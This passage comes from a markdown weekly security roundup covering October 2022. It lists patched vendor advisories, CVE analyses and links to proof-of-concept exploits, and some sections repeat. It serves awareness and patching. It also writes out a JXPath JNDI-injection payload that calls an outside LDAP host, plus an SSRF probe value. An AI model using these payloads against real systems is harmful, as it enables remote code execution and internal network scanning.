Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n   - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n       - Target/Product: **SolarWinds Platform 2022.3.**\n       - Affected Version : SolarWinds <= v2022.3 and Orion Platform <= 2020.2.6 HF5 .\n       - Description/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to insufficient control on a URL parameter, causing an insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n</details>\n\n<details>\n <summary> 🚑PoC for CVE & exploit (Total : 12 new 0-days in the last week)🚑:\n  \n > Every week we're tracking the recently discovered exploits and PoCs for CVEs.  \n</summary>\n \n   - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n        \n       - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n       - Affected Version: Watchdog Anti-Malware 4.1.422, Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n       - Description : We discovered an arbitrary code injection in the Zemana amsdk.sys kernel-mode driver, a part of the Zemana Antimalware SDK. The vulnerability allows injecting arbitrary code into one of the driver code sections and then executing it with kernel-mode privileges (local privilege escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n   - [PoC CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n       \n       - Target/Product: **Gluu**\n       - Affected Version: < v4.4.1 \n       - Title : Internal network scanner through Gluu IAM blind SSRF.                                   
\n       - Description : Gluu IAM is vulnerable to blind SSRF, which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: PoC author claims \"All\", but the CVE says versions < 80.0.3987.149\n       - Solution : upgrade Google Chrome to the latest version\n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n   - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n        \n       - Target/Product: **Microsoft Edge**\n       - Affected Version: < 97.0.1072.62\n       - Description : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute JavaScript code on every host without permission; an attacker can also steal local system files and manipulate actions against the machine, resulting in changes to internal developer settings in Microsoft Edge.\n\n   - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n        \n       - Target/Product: **MS Exchange**\n       - Description : The Metasploit script (PoC) for CVE-2022-41040. Microsoft Exchange is vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
\n \n   - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n        \n       - Target/Product: **Spring Cloud Gateway**\n       - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n       - Description : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\n   - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n        \n       - Target/Product: **7-Zip**\n       - Affected Version: Tested on version 19.00\n       - Description : 7-ZipPostExploit is a post-exploitation script to exfiltrate 7-Zip files (tested on version 19.00; the attacker already has access to the plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-Zip to an external attacker server, carried out in the post-exploitation phase.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)\n\n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.\n       - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)\n\n   - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n\n        - Target/Product: **Avira**\n        - Affected Version : \"Avira Security\" for Windows, version < 1.1.71.30554\n        - Description/Issue/Flaw : PoC for an arbitrary file move vulnerability in the Software Update component of Avira Security. Users have the option to use this feature to update any outdated software on their PC. When this feature is used, the Avira Security service drops the downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. The first file created in the subdirectory is named in the format <random 4 numbers>_<filename>; later this file is moved to just <filename> (the leading numbers and underscore are removed). This directory has DACLs that don't allow unprivileged users to modify/delete newly created files, but it does allow the user to create a junction. This can be abused by creating a junction point to a user-controlled directory that has more permissive DACLs; this way, when new files are created in subdirectories, the user is able to modify them and leverage that to obtain an arbitrary file move, which leads to LPE by writing a DLL into the system32 directory that is later loaded by a privileged service. The current PoC loads the DLL in the Windows Update service; the DLL doesn't implement any kind of mutex to check whether the exploit was already executed, which results in multiple cmd.exe processes being created as the DLL is loaded multiple times.\n \n \n   - [CVE-2022-23131](https://github.com/Mr-xn/cve-2022-23131)\n        \n       - Target/Product: **Zabbix**\n       - Description : Zabbix Unsafe Session Storage.\n \n   - [Sploits](https://github.com/3sjay/sploits)\n        \n       - Target/Product: **aukey wr-r01 router**\n       - Description : aukey-wr-01-RCE-0day.\n \n \n   - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n        \n       - Target/Product: **RealVNC server**\n       - Affected Version: up to 6.9.0\n       - Description : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n </details>\n \n---\nHave a good Weekend#13\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.\n\n \n      Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022).\n                                      featuring releases from Mozilla, Microsoft, Jenkins, GitHub, Cisco, Linux (Ubuntu 22.04, 20.04 & 18.04 LTS) etc.\n        \n      CVE:ANALYSIS & POC:             CVE-2022-40684, Zimbra 0Day CVE 2022-41352, CVE-2022-42889/ Text4Shell, CVE-2022-37969\n                                      CVE-2022-3236 & CVE-2022-36966.\n\n         \n      CVE POC (0-Day):                7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,\n                                      CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422 (Google Chrome).\n                                    \n<details>\n<summary>\n🔧Security patched within a week:🔧\n \n > We track the latest security advisories of top vendors and filter out high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security fixes (Severity : Critical or High) patched by top vendors in the last week. If you're using an older version of any of the mentioned vendors' products, an attacker could potentially exploit these flaws, for instance by tricking you into opening a specially crafted website in a browsing context, so we highly recommend **upgrading or updating vendor products from the original source.***\n \n - **Mozilla security advisories** : \n   - Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.\n \n - **Jenkins security advisories** : \n   - This week Jenkins announced [vulnerabilities in multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice is to follow the advisory and update the affected plugins.\n \n - **[Cisco security advisories](https://tools.cisco.com/security/center/publicationListing.x)** : \n   - Cisco has released security updates for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n \n - **GitHub security advisories** : \n   - [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)\n   - [run-terraform allows for RCE via terraform plan](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)\n   - [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)\n \n - Several security issues were fixed in different versions of **Ubuntu** Linux kernel packages. We highly recommend updating & upgrading these packages.\n   - **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library.\n\n   - **Ubuntu 20.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.\n\n   - **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws, linux-aws-5.15, linux-azure, linux-azure-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gke-5.15, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-oem-5.14, linux-oracle, linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.\n\n - **Microsoft** \n   - Microsoft has released a security advisory to provide information about a vulnerability that exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v\n     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9\n     - https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv\n     - https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9\n \n - **CISA Advisories**\n   > CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.\n     \n     - ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)\n     - ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)\n     - ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)\n\n</details>\n\n<details>\n<summary>\n📝CVE analysis, writeups & reports: (6 CVE analyses this week)📝\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.
\n</summary>\n \n  - [Analysis: CVE-2022-40684](https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/)\n   \n     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n     - [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)\n     - [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)\n\n     - Vendor : **Fortinet FortiGate**\n     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\n   - [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/)\n\n       - Target/Product: **Zimbra**\n       - Description/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n \n   - [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n        - [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)\n        - Payload : `jxPathContext.getValue(\"javax.naming.InitialContext.doLookup(\\\"ldap://check.dnslog.cn/obj\\\")\");`\n        - Target : **Apache Commons JXPath**\n        - Description : This vulnerability affects the Java library Apache Commons JXPath, which is used for processing XPath syntax. All versions (including the latest version) are affected by this vulnerability.\n\n   - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)\n       - [Analysis: Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)\n       - [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)\n       - [Tool : CVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files](https://github.com/jfrog/text4shell-tools)\n       - [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)\n \n       - Target/Product: **Apache Commons Text** is a software component used to manipulate character strings, published by the Apache Foundation.\n       - Solution : Upgrade to Apache Commons Text 1.10.0.\n       - Description/Issue/Flaw : CVE-2022-42889 Text4Shell: a remote code execution vulnerability in the Apache Commons Text software. On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect on the project's mailing list. This vulnerability closely resembles the Log4Shell CVE series and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another, or to construct messages from a preconfigured format.\n         \n   - [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part) \n \n       - Target/Product: **Microsoft** \n       - Description/Issue/Flaw : An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in the wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.\n \n   - [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)\n \n       - Target/Product: **SOPHOS**\n       - Description/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.\n \n \n   - [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)\n \n       - Target/Product: **SolarWinds Platform 2022.3.**\n       - Affected Version : SolarWinds Platform <= v2022.3 and Orion Platform <= 2020.2.6 HF5.\n       - Description/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to insufficient control of a URL parameter, causing an insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.\n \n</details>\n\n<details>\n <summary> 🚑PoC for CVE & exploit (Total : 12 new 0-day in last week)🚑:\n  \n > Every week we're tracking the recently discovered exploits and PoCs for CVEs.
\n</summary>\n \n   - [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)\n        \n       - Target/Product: **Zemana amsdk.sys kernel-mode driver**\n       - Affected Version: Watchdog Anti-Malware 4.1.422, Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.\n       - Description : We discovered an arbitrary code injection in the Zemana amsdk.sys kernel-mode driver, a part of the Zemana Antimalware SDK. The vulnerability allows injecting arbitrary code into one of the driver's code sections and then executing it with kernel-mode privileges (local privilege escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.\n \n \n   - [PoC CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)\n       \n       - Target/Product: **Gluu**\n       - Affected Version: < v4.4.1 \n       - Title : Internal network scanner through Gluu IAM blind SSRF.\n       - Description : Gluu IAM is vulnerable to blind SSRF, which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.\n\n   - [PoC CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n       \n       - Target/Product: **Google Chrome**\n       - Affected Version: PoC author claims \"All\", but the CVE says versions < 80.0.3987.149\n       - Solution : upgrade Google Chrome to the latest version\n       - Description : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n   - [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)\n        \n       - Target/Product: **Microsoft Edge**\n       - Affected Version: < 97.0.1072.62\n       - Description : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute JavaScript code on every host without permission; an attacker can also steal local system files and manipulate actions against the machine, resulting in changes to internal developer settings in Microsoft Edge.\n\n   - [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)\n        \n       - Target/Product: **MS Exchange**\n       - Description : The Metasploit script (PoC) for CVE-2022-41040. Microsoft Exchange is vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
\n \n   - [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)\n        \n       - Target/Product: **Spring Cloud Gateway**\n       - Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)\n       - Description : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\n   - [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)\n        \n       - Target/Product: **7-Zip**\n       - Affected Version: Tested on version 19.00\n       - Description : 7-ZipPostExploit is a post-exploitation script to exfiltrate 7-Zip files (tested on version 19.00; the attacker already has access to the plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-Zip to an external attacker server, carried out in the post-exploitation phase.\n \n   - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)\n\n       - Target/Product: **Microsoft Exchange Server**\n       - Description : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.\n       - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)\n\n   - [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)\n\n        - Target/Product: **Avira**\n        - Affected Version : \"Avira Security\" for Windows, version < 1.1.71.30554\n        - Description/Issue/Flaw : PoC for an arbitrary file move vulnerability in the Software Update component of Avira Security. Users have the option to use this feature to update any outdated software on their PC. When this feature is used, the Avira Security service drops the downloaded files in c:\\ProgramData\\Avira\\Security\\Temp. The first file created in the subdirectory is named in the format <random 4 numbers>_<filename>; later this file is moved to just <filename> (the leading numbers and underscore are removed). This directory has DACLs that don't allow unprivileged users to modify/delete newly created files, but it does allow the user to create a junction. This can be abused by creating a junction point to a user-controlled directory that has more permissive DACLs; this way, when new files are created in subdirectories, the user is able to modify them and leverage that to obtain an arbitrary file move, which leads to LPE by writing a DLL into the system32 directory that is later loaded by a privileged service. The current PoC loads the DLL in the Windows Update service; the DLL doesn't implement any kind of mutex to check whether the exploit was already executed, which results in multiple cmd.exe processes being created as the DLL is loaded multiple times.\n \n \n   - [CVE-2022-23131](https://github.com/Mr-xn/cve-2022-23131)\n        \n       - Target/Product: **Zabbix**\n       - Description : Zabbix Unsafe Session Storage.\n \n   - [Sploits](https://github.com/3sjay/sploits)\n        \n       - Target/Product: **aukey wr-r01 router**\n       - Description : aukey-wr-01-RCE-0day.\n \n \n   - [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)\n        \n       - Target/Product: **RealVNC server**\n       - Affected Version: up to 6.9.0\n       - Description : RealVNC server up to 6.9.0 DLL Hijacking Exploit.\n\n </details>\n \n---\nHave a good Weekend#12\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.\n\n \n      Security Patched within a Week: Latest vulnerabilities that have been patched within the last two weeks (12th Oct - 18th October 2022).\n                                      featuring releases from Apple, Microsoft, Adobe, GitHub, Google, Linux (Ubuntu, Kali etc.) etc.\n        \n      CVE:ANALYSIS & POC:             PoC for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell\n                                      and Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020\n\n         \n      CVE POC (0-Day):                CVE-2021-46422 (Google Chrome), CVE-2022-41852, CVE-2021-45067, PoC for CVE-2022-40684 & Nuclei template,\n                                      CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,\n                                    \n<details>\n<summary>\nSecurity Patched within a Week:\n \n > We track the latest security advisories of top vendors and filter out high and critical vulnerabilities that have been patched within a week.\n</summary>\n \n- *Here’s a look at the latest security fixes (Severity : Critical or High) patched by top vendors in the last 2 weeks (12th Oct - 18th October 2022). If you're using an older version of any of the mentioned vendors' products, an attacker could potentially exploit these flaws, for instance by tricking you into opening a specially crafted website in a browsing context, so we highly recommend **upgrading or updating vendor products from the original source.***\n \n - **Apple security advisory** : \n   - A vulnerability (CVE-2022-22658) was found in Apple iOS up to 16.0.2 (smartphone operating system). This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.\n \n - **Google security advisory** : \n   - This week Google released advisories for [Pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and [Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice is to update these products.\n \n - **Adobe security advisory** : \n   - Adobe has released security updates to address multiple vulnerabilities in Adobe software (ColdFusion, Acrobat and Reader, Adobe Commerce and Magento Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.\n \n - **GitHub security advisory** : \n   - The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.\n   - [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below. \n \n - Several security issues were fixed in different versions of **Ubuntu** Linux kernel packages. We highly recommend updating & upgrading these packages.\n   - **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solution etc.\n \n   - **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems\n\n   - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities, linux - Linux kernel, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-bluefield - Linux kernel for NVIDIA BlueField platforms, linux-gke - Linux kernel for Google Container Engine (GKE) systems, linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel, linux-ibm - Linux kernel for IBM cloud systems, linux-ibm-5.4 - Linux kernel for IBM cloud systems, linux-kvm - Linux kernel for cloud environments, linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n   - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n   - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system. [There have been 55+ security fixes in Microsoft products, packages & applications](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc.\n\n</details>\n\n<details>\n<summary>\nCVE Analysis, writeups & reports: (7 analyses that matter in the last week)\n \n > Every week, we collect the recently discovered writeups & reports for CVEs.
\n</summary>\n \n  - [Analysis: CVE-2022-40684 (CVSS score: 9.6)](https://www.helpnetsecurity.com/2022/10/14/cve-2022-40684-exploitation/)\n   \n     - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n     - [Nuclei template CVE-2022-40684](https://github.com/NagliNagli/BountyTricks/blob/main/CVE-2022-40684.yaml) (shared via [t.me/hackgit](https://t.me/hackgit/6129))\n     - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n\n     - Vendor : **Fortinet**\n     - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n     - Patched : Apply updates per vendor instructions.\n     - Description : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS, FortiProxy and FortiSwitchManager allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\n  - [Analysis: CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n      - Vendor : **Microsoft Products**\n      - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. \n      - Patched : Apply updates per vendor instructions.\n      - Description : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. 
The potential impact of an exploit of this vulnerability is considered to be very high.\n\n   - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak)\n   - [PoC : CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)\n\n       - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n       - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier).\n       - Description/Issue/Flaw : Out-of-bounds read caused by treating an ANSI string as Unicode in Acrobat Reader DC. This vulnerability can be exploited to leak sensitive information from the sandboxed Adobe Reader process.\n \n   - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n        - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) \n        - Target : **vm2 JavaScript sandbox library**\n        - Affected : version < 3.9.11\n        - Description : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new 